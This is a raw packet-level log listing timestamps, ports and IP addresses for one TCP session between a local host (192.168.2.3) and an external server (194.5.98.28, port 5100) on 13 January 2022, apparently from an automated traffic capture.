Jan 13, 2022 15:33:42.241487980 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.241523027 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.241569996 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.435790062 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.435890913 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.453947067 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.454011917 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.454051018 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.454083920 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.454133034 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.454140902 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.454248905 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.454289913 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.454315901 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.454335928 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.454359055 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.454391003 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.454523087 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.454581976 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.454655886 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.454699039 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.454718113 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.454761982 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.454895020 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.454936028 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.454966068 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.455043077 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.455121994 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.455226898 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.455269098 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.455271959 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.455290079 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.455316067 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.455495119 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.455560923 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.455723047 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.455766916 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.455786943 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.455825090 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.456026077 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.456105947 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.456147909 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.456217051 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.456301928 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.456372976 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.458352089 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.458467007 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.458473921 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.458568096 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.458642960 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.458714008 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.458791971 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.459049940 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.459096909 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.459119081 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.459197044 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.459253073 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.459398031 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.459436893 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.459458113 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.459506035 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.459528923 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.459677935 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.459702969 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.459763050 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.459906101 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.459991932 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.460208893 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.460287094 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.460326910 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.460369110 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.460391998 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.460410118 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.460429907 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.460452080 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.460469007 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.460504055 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.460720062 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.460762978 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.460777998 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.460818052 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.460905075 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.460962057 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.461116076 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.461152077 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.461188078 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.461229086 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.461289883 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.461543083 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.461590052 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.461613894 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.461728096 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.461730957 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.461771011 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.461791992 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.461852074 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.462115049 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.462147951 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.462179899 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.462187052 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.462213039 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.462213993 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.462233067 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.462246895 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.462274075 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.462302923 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.680042982 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.680111885 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.680150986 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.680182934 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.680213928 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.680229902 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.680282116 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.680319071 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.680406094 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.680452108 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.680474997 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.680542946 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.680658102 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.680700064 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.680726051 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.680737019 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.680778027 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.680778027 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.680846930 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.680869102 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.680993080 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.681035042 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.681051970 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.681088924 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.681215048 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.681282043 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.681359053 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.681397915 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.681436062 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.681441069 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.681457043 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.681504011 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.681581974 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.681622028 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.681648970 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.681679964 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.681793928 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.681859970 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.682013035 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.682056904 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.682074070 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.682109118 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.682178020 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.682230949 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.682327032 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.682368040 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.682383060 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.682429075 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.682498932 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.682557106 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.682560921 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.682615042 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.682693958 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.682749033 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.682845116 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.682884932 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.682899952 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.682936907 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.682998896 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.683052063 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.683209896 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.683250904 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.683267117 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.683301926 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.683372974 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.683413029 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.683428049 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.683470011 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.683552027 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.683609009 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.683784962 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.683825970 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.683851957 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.683877945 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.683948040 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.684000969 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.684334993 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.684370041 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.684391022 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.684407949 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.684437037 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.684447050 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.684461117 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.684530973 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.684604883 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.684669018 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.684802055 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.684842110 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.684864998 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.684880018 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.684897900 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.684920073 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.684937000 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.684976101 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.686391115 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.686431885 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.686470032 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.686474085 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.686501026 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.686512947 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.903297901 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.903362036 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.903410912 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.903429031 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.903446913 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.903467894 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.903472900 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.903522968 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.904395103 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.904438019 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.904468060 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.904476881 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.904519081 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.904520988 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.904535055 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.904560089 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.904584885 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.904628992 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.904685974 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.904743910 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.904892921 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.904952049 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.905029058 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.905070066 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.905086994 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.905133009 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.905205965 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.905246973 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.905261993 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.905297995 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.905610085 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.905651093 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.905667067 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.905689001 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.905706882 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.905740023 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.905760050 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.905801058 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.905817032 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.905854940 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.906007051 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.906047106 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.906066895 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.906090975 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.906189919 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.906232119 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.906239986 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.906280041 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.906613111 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.906653881 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.906676054 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.906693935 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.906703949 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.906749964 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.906765938 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.906822920 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.906966925 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.907011032 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.907018900 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.907058954 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.907100916 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.907152891 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.907186031 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.907247066 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.907385111 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.907440901 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.908843994 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.908909082 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.908926010 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.909002066 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.909048080 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.909106016 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.909295082 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.909362078 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.909434080 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.909495115 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.909661055 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.909701109 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.909729958 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.909759998 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.909836054 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.909895897 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.910161972 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.910229921 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.910367966 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.910429001 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.910530090 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.910571098 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.910598993 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.910667896 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.910749912 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.910784960 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.910806894 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.910824060 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.911176920 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.911201954 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.911226034 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:42.911242008 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.911288023 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:42.939316988 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.119946003 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.119980097 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.120017052 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.120065928 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.121102095 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.121167898 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.124136925 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.124200106 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.124308109 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.124332905 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.124360085 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.124383926 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.124743938 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.124799967 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.125220060 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.125274897 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.125370026 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.125428915 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.125773907 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.125822067 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.126085043 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.126108885 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.126151085 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.126188993 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.126287937 CET	5100	49801	194.5.98.28	192.168.2.3
Jan 13, 2022 15:33:43.126337051 CET	49801	5100	192.168.2.3	194.5.98.28
Jan 13, 2022 15:33:43.127121925 CET	5100	49801	194.5.98.28	192.168.2.3
